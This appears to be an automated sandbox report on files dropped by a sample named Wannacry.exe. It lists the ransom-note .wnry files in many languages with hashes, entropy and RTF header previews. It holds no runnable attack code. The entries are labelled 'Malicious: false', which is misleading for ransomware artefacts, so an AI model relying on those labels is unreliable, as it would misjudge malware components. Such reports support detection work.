SHA-512:	86B658B4A6F605808D155A99D7C0CD37474BE6BC1F2AD6D567298AEDA7FF9A1B9F089D6FE5970D6589872ABAC829B9CFED59E85FB4B969CFB37044E8815064DE
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......y%....[n[xW..m.z.F...5^.~h..`.s}.....5.>....;....3...........+..GsA:......,N.i.@........`..[..Qj><:w..{.}.NB.d.pr.V....y...C.............1....I.w.....pl.2l3.8p.LC..v.........+..-...9.....2: z....hE...T.L..B..L......V..GX:.Aav..m)AH.............k.M...I..>SkW....u...2i..............x..1.N.\|.`'......San.Y.;;J<;..vT-Eb3..P..-u..m....&u.+]..t".:.6U..l....Q...YJ.....#.$...6...$V..\|/.,.-f.\h4....\|Gg.$.i....~#.W.I._L.........<.s.T._.E=.%...%

C:\Users\user\Desktop\msg\m_bulgarian.wnry

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
Category:	dropped
Size (bytes):	47879
Entropy (8bit):	4.950611667526586
Encrypted:	false
SSDEEP:	768:Shef3jHdCG28Eb1tyci8crbEw6/5+3xFkbP0vyzbZrS14e:SheU5De
MD5:	95673B0F968C0F55B32204361940D184
SHA1:	81E427D15A1A826B93E91C3D2FA65221C8CA9CFF
SHA-256:	40B37E7B80CF678D7DD302AAF41B88135ADE6DDF44D89BDBA19CF171564444BD
SHA-512:	7601F1883EDBB4150A9DC17084012323B3BFA66F6D19D3D0355CF82B6A1C9DCE475D758DA18B6D17A8B321BF6FCA20915224DBAEDCB3F4D16ABFAF7A5FC21B92
Malicious:	false
Reputation:	unknown
Preview:	{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

C:\Users\user\Desktop\msg\m_chinese (simplified).wnry

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
Category:	dropped
Size (bytes):	54359
Entropy (8bit):	5.015093444540877
Encrypted:	false
SSDEEP:	768:SWjkSFwwlUdcUG2HAmDTzpXtgmDNQ8qD7DHDqMtgDdLDMaDoKMGzD0DWJQ8/QoZ4:SWcwiqDB
MD5:	0252D45CA21C8E43C9742285C48E91AD
SHA1:	5C14551D2736EEF3A1C1970CC492206E531703C1
SHA-256:	845D0E178AEEBD6C7E2A2E9697B2BF6CF02028C50C288B3BA88FE2918EA2834A
SHA-512:	1BFCF6C0E7C977D777F12BD20AC347630999C4D99BD706B40DE7FF8F2F52E02560D68093142CC93722095657807A1480CE3FB6A2E000C488550548C497998755
Malicious:	false
Reputation:	unknown
Preview:	{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\\panose 020b0604020202020204}Arial;}..{\f12\fbidi \froman\fcharset129\fprq2{\\panose 02030600000101010101}\'b9\'d9\'c5\'c1{\\falt Batang};}{\f18\fbidi \fmodern\fcharset136\fprq1{\\panose 02020509000000000000}MingLiU{\\falt 2OcuAe};}..{\f34\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria Math;}{\f41\fbidi \fmodern\fcharset0\fprq1{\\panose 020b0609020204030204}Consolas;}{\f44\fbidi \froman\fcharset129\fprq2{\\panose 02030600000101010101}@\'b9\'d9\'c5\'c1;}..{\f45\fbidi \fmodern\fcharset136\fprq1{\\panose 02020509000000000000}@MingLiU;}{\f53\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}\'b1\'bc\'b8\'b2\'c3\'bc;}..{\f54\fbidi \fmodern\fchar

C:\Users\user\Desktop\msg\m_chinese (traditional).wnry

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
Category:	dropped
Size (bytes):	79346
Entropy (8bit):	4.901891087442577
Encrypted:	false
SSDEEP:	768:SDwtkzjHdLG2xN1fyvnywUKB5lylYlzlJpsbuEWeM/yDRu9uCuwyInIwDOHEhm/v:SDnz5Rt4D4
MD5:	2EFC3690D67CD073A9406A25005F7CEA
SHA1:	52C07F98870EABACE6EC370B7EB562751E8067E9
SHA-256:	5C7F6AD1EC4BC2C8E2C9C126633215DABA7DE731AC8B12BE10CA157417C97F3A
SHA-512:	0766C58E64D9CDA5328E00B86F8482316E944AA2C26523A3C37289E22C34BE4B70937033BEBDB217F675E40DB9FECDCE0A0D516F9065A170E28286C2D218487C
Malicious:	false
Reputation:	unknown
Preview:	{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\\panose 020b0604020202020204}Arial;}..{\f11\fbidi \fmodern\fcharset128\fprq1{\\panose 02020609040205080304}MS Mincho{\\falt ?l?r ??\'81\'66c};}{\f12\fbidi \froman\fcharset129\fprq2{\\panose 02030600000101010101}\'b9\'d9\'c5\'c1{\\falt Batang};}..{\f18\fbidi \fmodern\fcharset136\fprq1{\\panose 02020509000000000000}MingLiU{\\falt 2OcuAe};}{\f34\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria Math;}..{\f36\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}{\f40\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\\panose 020

C:\Users\user\Desktop\msg\m_croatian.wnry

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
Category:	dropped
Size (bytes):	39070
Entropy (8bit):	5.03796878472628
Encrypted:	false
SSDEEP:	384:SheftipUENLFsPzy3EFHjHdb2YG2+d18Scgn8c8/868H1F8E8/8Z3m8VdAm86a8n:Shef3jHd3G2n+p/mZrS14A
MD5:	17194003FA70CE477326CE2F6DEEB270
SHA1:	E325988F68D327743926EA317ABB9882F347FA73
SHA-256:	3F33734B2D34CCE83936CE99C3494CD845F1D2C02D7F6DA31D42DFC1CA15A171
SHA-512:	DCF4CCF0B352A8B271827B3B8E181F7D6502CA0F8C9DDA3DC6E53441BB4AE6E77B49C9C947CC3EDE0BF323F09140A0C068A907F3C23EA2A8495D1AD96820051C
Malicious:	false
Reputation:	unknown
Preview:	{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

C:\Users\user\Desktop\msg\m_czech.wnry

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
Category:	dropped
Size (bytes):	40512
Entropy (8bit):	5.035949134693175
Encrypted:	false
SSDEEP:	384:SheftipUENLFsPzy3EFHjHdg2yG2gv8n8+8zfB8k8F8i8k1Z8M8I818E838C8A8s:Shef3jHd2G26nyMZrS14g
MD5:	537EFEECDFA94CC421E58FD82A58BA9E
SHA1:	3609456E16BC16BA447979F3AA69221290EC17D0
SHA-256:	5AFA4753AFA048C6D6C39327CE674F27F5F6E5D3F2A060B7A8AED61725481150
SHA-512:	E007786FFA09CCD5A24E5C6504C8DE444929A2FAAAFAD3712367C05615B7E1B0FBF7FBFFF7028ED3F832CE226957390D8BF54308870E9ED597948A838DA1137B
Malicious:	false
Reputation:	unknown
Preview:	{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

C:\Users\user\Desktop\msg\m_danish.wnry

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
Category:	dropped
Size (bytes):	37045
Entropy (8bit):	5.028683023706024
Encrypted:	false
SSDEEP:	384:SheftipUENLFsPzy3EFHjHd02wG2roqni2Jeo75Y3kmA31dv61QyU:Shef3jHd4G2M5bZrS14Q
MD5:	2C5A3B81D5C4715B7BEA01033367FCB5
SHA1:	B548B45DA8463E17199DAAFD34C23591F94E82CD
SHA-256:	A75BB44284B9DB8D702692F84909A7E23F21141866ADF3DB888042E9109A1CB6
SHA-512:	490C5A892FAC801B853C348477B1140755D4C53CA05726AC19D3649AF4285C93523393A3667E209C71C80AC06FFD809F62DD69AE65012DCB00445D032F1277B3
Malicious:	false
Reputation:	unknown
Preview:	{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

C:\Users\user\Desktop\msg\m_dutch.wnry

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
Category:	dropped
Size (bytes):	36987
Entropy (8bit):	5.036160205965849
Encrypted:	false
SSDEEP:	384:Sw3BHSj2cLeT+sPzy3EFHjHdp2oG2/CzhReo75Y3kmA31dv61Qyz:Sw3BHSWjHdBG2/UhsZrS14f
MD5:	7A8D499407C6A647C03C4471A67EAAD7
SHA1:	D573B6AC8E7E04A05CBBD6B7F6A9842F371D343B
SHA-256:	2C95BEF914DA6C50D7BDEDEC601E589FBB4FDA24C4863A7260F4F72BD025799C
SHA-512:	608EF3FF0A517FE1E70FF41AEB277821565C5A9BEE5103AA5E45C68D4763FCE507C2A34D810F4CD242D163181F8341D9A69E93FE32ADED6FBC7F544C55743F12
Malicious:	false
Reputation:	unknown
Preview:	{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}..{\f34\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria;}{\f41\fbidi \fmodern\fcharset0\fprq1{\\panose 020b0609020204030204}Consolas;}..{\f53\fbidi \fmodern\fcharset129\fprq1{\\panose 020b0609000101010101}\'b1\'bc\'b8\'b2\'c3\'bc;}{\f54\fbidi \fmodern\fcharset129\fprq1{\\panose 020b0609000101010101}@\'b1\'bc\'b8\'b2\'c3\'bc;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}

C:\Users\user\Desktop\msg\m_english.wnry

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
Category:	dropped
Size (bytes):	36973
Entropy (8bit):	5.040611616416892
Encrypted:	false
SSDEEP:	384:S93BHSj2cguALeT+sPzy3EFHjHdM2EG2YLC7O3eo75Y3kmA31dv61QyW:S93BHSTjHd0G2YLCZrS14y
MD5:	FE68C2DC0D2419B38F44D83F2FCF232E
SHA1:	6C6E49949957215AA2F3DFB72207D249ADF36283
SHA-256:	26FD072FDA6E12F8C2D3292086EF0390785EFA2C556E2A88BD4673102AF703E5
SHA-512:	941FA0A1F6A5756ED54260994DB6158A7EBEB9E18B5C8CA2F6530C579BC4455918DF0B38C609F501CA466B3CC067B40E4B861AD6513373B483B36338AE20A810
Malicious:	false
Reputation:	unknown
Preview:	{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria;}{\f41\fbidi \fmodern\fcharset0\fprq1{\\panose 020b0609020204030204}Consolas;}..{\f53\fbidi \fmodern\fcharset129\fprq1{\\panose 020b0609000101010101}\'b1\'bc\'b8\'b2\'c3\'bc;}{\f54\fbidi \fmodern\fcharset129\fprq1{\\panose 020b0609000101010101}@\'b1\'bc\'b8\'b2\'c3\'bc;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\fhim

C:\Users\user\Desktop\msg\m_filipino.wnry

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
Category:	dropped
Size (bytes):	37580
Entropy (8bit):	5.0458193216786
Encrypted:	false
SSDEEP:	384:Sw3BHSj2cLeT+sPzy3EFHjHdi2MG2AGsi6p07i/eo75Y3kmA31dv61QyR:Sw3BHSWjHdGG2Axa7iGZrS14N
MD5:	08B9E69B57E4C9B966664F8E1C27AB09
SHA1:	2DA1025BBBFB3CD308070765FC0893A48E5A85FA
SHA-256:	D8489F8C16318E524B45DE8B35D7E2C3CD8ED4821C136F12F5EF3C9FC3321324
SHA-512:	966B5ED68BE6B5CCD46E0DE1FA868CFE5432D9BF82E1E2F6EB99B2AEF3C92F88D96F4F4EEC5E16381B9C6DB80A68071E7124CA1474D664BDD77E1817EC600CB4
Malicious:	false
Reputation:	unknown
Preview:	{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}..{\f34\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria;}{\f41\fbidi \fmodern\fcharset0\fprq1{\\panose 020b0609020204030204}Consolas;}..{\f53\fbidi \fmodern\fcharset129\fprq1{\\panose 020b0609000101010101}\'b1\'bc\'b8\'b2\'c3\'bc;}{\f54\fbidi \fmodern\fcharset129\fprq1{\\panose 020b0609000101010101}@\'b1\'bc\'b8\'b2\'c3\'bc;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}

C:\Users\user\Desktop\msg\m_finnish.wnry

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
Category:	dropped
Size (bytes):	38377
Entropy (8bit):	5.030938473355282
Encrypted:	false
SSDEEP:	384:SheftipUENLFsPzy3EFHjHdg2oG2l1glOmeo75Y3kmA31dv61QyB:Shef3jHdMG2l1AO3ZrS14l
MD5:	35C2F97EEA8819B1CAEBD23FEE732D8F
SHA1:	E354D1CC43D6A39D9732ADEA5D3B0F57284255D2
SHA-256:	1ADFEE058B98206CB4FBE1A46D3ED62A11E1DEE2C7FF521C1EEF7C706E6A700E
SHA-512:	908149A6F5238FCCCD86F7C374986D486590A0991EF5243F0CD9E63CC8E208158A9A812665233B09C3A478233D30F21E3D355B94F36B83644795556F147345BF
Malicious:	false
Reputation:	unknown
Preview:	{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

C:\Users\user\Desktop\msg\m_french.wnry

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
Category:	dropped
Size (bytes):	38437
Entropy (8bit):	5.031126676607223
Encrypted:	false
SSDEEP:	384:SheftipUENLFsPzy3EFHjHdtW2IG2sjqMeo75Y3kmA31dv61Qyg:Shef3jHd0G2smJZrS14M
MD5:	4E57113A6BF6B88FDD32782A4A381274
SHA1:	0FCCBC91F0F94453D91670C6794F71348711061D
SHA-256:	9BD38110E6523547AED50617DDC77D0920D408FAEED2B7A21AB163FDA22177BC
SHA-512:	4F1918A12269C654D44E9D394BC209EF0BC32242BE8833A2FBA437B879125177E149F56F2FB0C302330DEC328139B34982C04B3FEFB045612B6CC9F83EC85AA9
Malicious:	false
Reputation:	unknown
Preview:	{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

C:\Users\user\Desktop\msg\m_german.wnry

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
Category:	dropped
Size (bytes):	37181
Entropy (8bit):	5.039739267952546
Encrypted:	false
SSDEEP:	384:SheftipUENLFsPzy3EFHjHdN26G2VSA1Ieo75Y3kmA31dv61QyU:Shef3jHdfG2oe1ZrS14w
MD5:	3D59BBB5553FE03A89F817819540F469
SHA1:	26781D4B06FF704800B463D0F1FCA3AFD923A9FE
SHA-256:	2ADC900FAFA9938D85CE53CB793271F37AF40CF499BCC454F44975DB533F0B61
SHA-512:	95719AE80589F71209BB3CB953276538040E7111B994D757B0A24283AEFE27AADBBE9EEF3F1F823CE4CABC1090946D4A2A558607AC6CAC6FACA5971529B34DAC
Malicious:	false
Reputation:	unknown
Preview:	{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

C:\Users\user\Desktop\msg\m_greek.wnry

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
Category:	dropped
Size (bytes):	49044
Entropy (8bit):	4.910095634621579
Encrypted:	false
SSDEEP:	384:SheftipUENLFsPzy3EFHjHdc2oG2WWDFFG5BwKeo75Y3kmA31dv61QyM:Shef3jHdoG2NHG5BwLZrS14Q
MD5:	FB4E8718FEA95BB7479727FDE80CB424
SHA1:	1088C7653CBA385FE994E9AE34A6595898F20AEB
SHA-256:	E13CC9B13AA5074DC45D50379ECEB17EE39A0C2531AB617D93800FE236758CA9
SHA-512:	24DB377AF1569E4E2B2EBCCEC42564CEA95A30F1FF43BCAF25A692F99567E027BCEF4AACEF008EC5F64EA2EEF0C04BE88D2B30BCADABB3919B5F45A6633940CB
Malicious:	false
Reputation:	unknown
Preview:	{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba

C:\Users\user\Desktop\msg\m_indonesian.wnry

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
Category:	dropped
Size (bytes):	37196
Entropy (8bit):	5.039268541932758
Encrypted:	false
SSDEEP:	384:Sw3BHSj2cLeT+sPzy3EFHjHdY2oG2pq32eo75Y3kmA31dv61Qys:Sw3BHSWjHdUG2pq3nZrS14I
MD5:	3788F91C694DFC48E12417CE93356B0F
SHA1:	EB3B87F7F654B604DAF3484DA9E02CA6C4EA98B7
SHA-256:	23E5E738AAD10FB8EF89AA0285269AFF728070080158FD3E7792FE9ED47C51F4
SHA-512:	B7DD9E6DC7C2D023FF958CAF132F0544C76FAE3B2D8E49753257676CC541735807B4BEFDF483BCAE94C2DCDE3C878C783B4A89DCA0FECBC78F5BBF7C356F35CD
Malicious:	false
Reputation:	unknown
